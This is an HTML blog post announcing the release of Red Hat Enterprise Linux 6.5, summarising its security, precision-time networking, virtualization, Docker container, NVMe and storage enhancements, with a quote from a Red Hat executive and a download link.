<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjw3UWlbAT9lo_enBdOet8r1w-bpK-GNP6N0K5wK5ybay7w26908sqB_LduEH-0jLcGkJfMz-Lvxf1ih5oKSmneY9Wtd4NgQfvzfcOv-JFsCGILNUiXS56QaNeCdcwL2euvkjey5j2O8xE/s1600/redhat-enterprise-linux-rhel-6.5-released.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="250" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjw3UWlbAT9lo_enBdOet8r1w-bpK-GNP6N0K5wK5ybay7w26908sqB_LduEH-0jLcGkJfMz-Lvxf1ih5oKSmneY9Wtd4NgQfvzfcOv-JFsCGILNUiXS56QaNeCdcwL2euvkjey5j2O8xE/s400/redhat-enterprise-linux-rhel-6.5-released.png" width="400" /></a></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
The <b><a href="http://www.voiceofgreyhat.com/search?q=RHEL">RHEL 6x</a></b> series gets another important update as <b><a href="http://www.voiceofgreyhat.com/search?q=Red+Hat">Red Hat Inc</a></b>, the world's leading provider of open source solutions, announced the general availability of <b><span style="color: red;">Red Hat Enterprise Linux 6.5</span></b>, the latest version of <a href="http://www.voiceofgreyhat.com/search?q=Red%20Hat%20Enterprise%20Linux%206">Red Hat Enterprise Linux 6</a>. According to the official Red Hat press release, RHEL 6.5 expands Red Hat’s vision of providing an enterprise platform that has the stability to free IT to take on major infrastructure challenges and the flexibility to handle future requirements, with an extensive partner and support ecosystem. </div>
<div style="text-align: justify;">
Red Hat Enterprise Linux 6.5 is mainly designed for those who build and manage large, complex IT projects, especially enterprises that require an <a href="http://www.voiceofgreyhat.com/search?q=hybrid+cloud">open hybrid cloud</a>. From <a href="http://www.voiceofgreyhat.com/search?q=security">security</a> and <a href="http://www.voiceofgreyhat.com/search?q=networking">networking</a> to <a href="http://www.voiceofgreyhat.com/search?q=virtualization">virtualization</a>, Red Hat Enterprise Linux 6.5 provides the capabilities needed to manage these environments, such as tools that aid in quickly tuning the system to run <b>SAP applications based on published best practices from SAP</b>. “Red Hat Enterprise Linux 6.5 provides the innovation expected from the industry’s leading enterprise Linux operating system while also delivering a mature platform for business operations, be it standardizing operating environments or supporting critical applications. The newest version of Red Hat Enterprise Linux 6 forms the building blocks of the entire Red Hat portfolio, including OpenShift and OpenStack, making it a perfect foundation for enterprises looking to explore the open hybrid cloud,” said Jim Totton, vice president and general manager of Red Hat Inc. Now let's take a closer look at the main highlights of RHEL 6.5: </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<div>
<b><span style="font-size: large;">Securing the Next-Generation Enterprise</span></b></div>
<div>
Red Hat Enterprise Linux 6.5 continues the push for integrated security functionality that combines ease-of-use and up-to-date security standards into the platform. The addition of a centralized certificate trust store enables standardized certificate access for security services. Also included are tools that meet leading security standards, including OpenSCAP 2.1, which implements the National Institute of Standards and Technology’s (NIST’s) Security Content Automation Protocol (SCAP) 1.2 standard. With these additions, Red Hat Enterprise Linux 6 provides a secure platform upon which to build mission-critical services and applications.</div>
<div>
<br /></div>
<div>
<b><span style="font-size: large;">Networking – When Every (Micro)Second Matters</span></b></div>
<div>
In the financial services and trading-related industries, application latency is measured in microseconds, not seconds. Now, the latest version of Red Hat Enterprise Linux 6 fully supports sub-microsecond clock accuracy over the local area network (LAN) using the Precision Time Protocol (PTP). Precision time synchronization is a key enabler for delivering better performance for high-speed, low latency applications. Red Hat Enterprise Linux 6.5 can now be used to track time on trading transactions, improving time stamp accuracy on archived data or precisely synchronizing time locally or globally. Thanks to other networking enhancements in Red Hat Enterprise Linux 6.5, system administrators now have a more comprehensive view of network activity. These new capabilities enable sysadmins to inspect IGMP (Internet Group Management Protocol) data to list multicast router ports, multicast groups with active subscribers and their associated interfaces, all of which are important to many modern networking scenarios, including streaming media.</div>
<div>
<br /></div>
<div>
<b><span style="font-size: large;">Virtualization Enhancements</span></b></div>
<div>
Red Hat Enterprise Linux 6.5 continues Red Hat’s commitment to improving the overall virtualization experience and includes several improvements that make it a compelling choice for running in virtualized environments. Sysadmins can now dynamically enable or disable virtual processors (vCPUs) in active guests, making the platform an ideal choice for elastic workloads. The handling of memory-intensive applications as Red Hat Enterprise Linux guests has also been improved, with configurations supported for up to 4TB of memory on the Kernel-based Virtual Machine (KVM) hypervisor. The KVM hypervisor also integrates with GlusterFS volumes to provide direct access to the distributed storage platform, improving performance when accessing Red Hat Storage or GlusterFS volumes. Finally, guest drivers have been updated to improve performance of Red Hat Enterprise Linux 6.5 running as a guest on supported third-party hypervisors.</div>
<div>
<br /></div>
<div>
<b><span style="font-size: large;">Evolving Ease-of-Use, Storage, and More</span></b></div>
<div>
As application deployment options grow, portability becomes increasingly important. Red Hat Enterprise Linux 6.5 enables customers to deploy application images in containers created using Docker in their environment of choice: physical, virtual, or cloud. Docker is an open source project to package and run lightweight, self-sufficient containers; containers save developers time by eliminating integration and infrastructure design tasks. Red Hat Enterprise Linux 6.5 stays current with advancements in Solid-State Drive (SSD) controller interfaces, introducing support for NVM Express (NVMe)-based SSDs. The NVMe specification aims to standardize the interface for PCIe-based SSDs, and its inclusion in Red Hat Enterprise Linux 6.5 positions the platform to support an expanding range of future NVMe-based devices.</div>
<div>
<br /></div>
<div>
Enterprise storage scalability has also been improved in Red Hat Enterprise Linux 6.5. It is now possible to configure more than 255 LUNs connected to a single iSCSI target. In addition, control and recovery from SAN for iSCSI and Fibre Channel has been enhanced, and updates to the kexec/kdump mechanism now make it possible to create debug (dump) files on systems configured with very large memory (e.g. 6TB).</div>
<div>
<br /></div>
<div>
Red Hat Enterprise Linux 6.5 makes it easier to track and manage subscription consumption across the enterprise, integrating subscription tracking into existing business workflow. Usability enhancements include support for remote access to Windows clients and servers that use a newer version of the <a href="http://www.voiceofgreyhat.com/search?q=RDP">RDP</a> protocol, including <a href="http://www.voiceofgreyhat.com/search?q=Windows+7">Windows 7</a> and <a href="http://www.voiceofgreyhat.com/search?q=Windows+8">8</a> desktops and <a href="http://www.voiceofgreyhat.com/search?q=Windows+Server+2012">Windows Server 2012</a>. </div>
<div>
<br /></div>
<div style="text-align: center;">
To Download <b>Red Hat Enterprise Linux 6.5</b> Click <b><a href="http://www.redhat.com/products/enterprise-linux/server/download.html">Here</a></b></div>
<div style="text-align: center;">
<br /></div>
</div>
</div>
Avik Sarkar http://www.blogger.com/profile/15506950346762737730 noreply@blogger.com